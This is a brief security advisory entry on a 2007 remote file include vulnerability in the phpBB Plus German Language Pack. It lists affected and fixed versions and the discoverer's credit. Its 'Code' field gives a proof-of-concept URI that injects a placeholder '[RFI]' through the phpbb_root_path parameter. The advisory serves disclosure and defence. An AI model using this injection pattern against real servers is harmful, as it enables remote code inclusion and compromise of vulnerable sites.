| Title |
PHPBB Plus German Language Pack PHPBB_Root_Path Parameter Remote File Include Vulnerability |
| Published |
2007-09-19-12:00AM |
| Updated |
2007-09-24-08:40PM |
| Class |
Input Validation Error |
| CVE |
|
| Remote |
Yes |
| Local |
No |
| Credit |
Mehrad Ansari Targhi is credited with the discovery of this vulnerability. |
| Vulnerable |
phpBB2 phpBB2 Plus German Language Pack 0 phpBB Group phpBB 2.0.13 phpBB Group phpBB 2.0.12 phpBB2 phpBB2 Plus 1.53 phpBB Group phpBB 2.0.13 phpBB Group phpBB 2.0.12
|
| Not Vulnerable |
phpBB2 phpBB2 Plus 1.53a phpBB Group phpBB 2.0.13 phpBB Group phpBB 2.0.12
|
| Code |
Attackers can exploit this issue via a browser.The following proof-of-concept URI is available:http://www.example.com/language/lang_german/lang_main_album.php?phpbb_root_path=[RFI]?a= |
| TXT |
 |